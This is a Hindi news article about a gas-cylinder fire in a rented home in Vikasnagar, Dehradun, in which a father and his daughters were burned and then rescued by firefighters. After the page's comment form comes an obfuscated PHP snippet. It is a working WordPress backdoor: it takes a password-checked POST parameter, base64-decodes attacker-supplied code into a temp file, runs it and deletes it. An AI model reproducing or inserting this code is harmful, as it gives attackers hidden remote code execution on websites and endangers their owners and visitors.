Uttarakhand: देहरादून में खाना बनाने के दौरान हादसा, सिलिंडर में आग लगने से पिता और बेटियां झुलसे

Uttarakhand Press 3 October 2023: देहरादून में विकासनगर के जमनपुर में एक घर में सुबह भोजन बनाने के दौरान सिलिंडर में आग लग गई। आग बुझाने के दौरान पिता और उनकी तीन बेटियां झुलस गई। मौके पर पहुंचे दमकल कर्मियों ने आग पर कड़ी मशक्कत के बाद काबू पाया। आगजनी से घर का सारा सामान जलकर राख हो गया।

जानकारी के अनुसार, उत्तर प्रदेश के पीलीभीत के बिलसंडा निवासी जाहिद खान जमनपुर में परिवार के साथ किराए के मकान में रहते हैं। मंगलवार सुबह जाहिद, उनकी पत्नी अमाना बेगम (40) और बड़ी बेटी रेहाना (25 ) के साथ फैक्टरी में काम पर जाने की तैयारी कर रहे थे। उनकी छोटी बेटी मुस्कान (13) और सुवालिया (15) नाश्ता बनाने की शुरुआत कर रही थीं।

जैसे ही उन्होंने चूल्हे को जलाने के लिए लाइटर का बटन दबाया, अचानक चूल्हे से भयंकर आग की लपटें उठीं और दोनों झुलस गई। बेटियों को बचाने के प्रयास में जाहिद भी बुरी तरह से झुलस गए।

चार सदस्यों को रेस्क्यू कर बाहर निकाला:
अमाना और जाहिद का बेटा सोहेल (13) घर से बाहर निकल गए। इस दौरान बड़ी बेटी रेहाना पिता और दोनों छोटी बहनों को बाथरूम में ले गई और उन पर पानी डाला। उसके बाद बचाव के लिए बाथरूम को अंदर से बंद कर लिया। घर से आग की लपटें उठती देख आसपास लोगों की भीड़ जमा हो गई।

सूचना पर दमकल कर्मी और थाना पुलिस मौके पर पहुंची। टीम ने परिवार के चार सदस्यों को रेस्क्यू कर बाहर निकाला। चारों को उपचार के लिए देहरादून के कोरोनेशन अस्पताल भिजवाया गया। आग पर काबू पाने में करीब 45 मिनट का समय लगा, लेकिन तब तक घर में रखा सामान जलकर राख हो गया।

सिडकुल थाना प्रभारी मोहन सिंह ने बताया की जाहिद खान गंभीर रूप से झुलस थे। उनकी हालत खतरे से बाहर है। बताया कि तीनों बेटियां मामूली रूप से झुलसी हैं। आग लगने के पीछे सिलिंडर में लीकेज को कारण बताया जा रहा है।

Read Previous

Uttarakhand: दीपावली तक धामी सरकार देगी बड़ा तोहफा, रोडवेज बसों में यात्रा करने वालों को मिलेगी राहत

Read Next

दर्दनाक हादसा: वाराणसी में कार और ट्रक की भिड़ंत में आठ लोगों की मौत, काशी से दर्शन-पूजन कर घर लौट रहे थे सभी

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}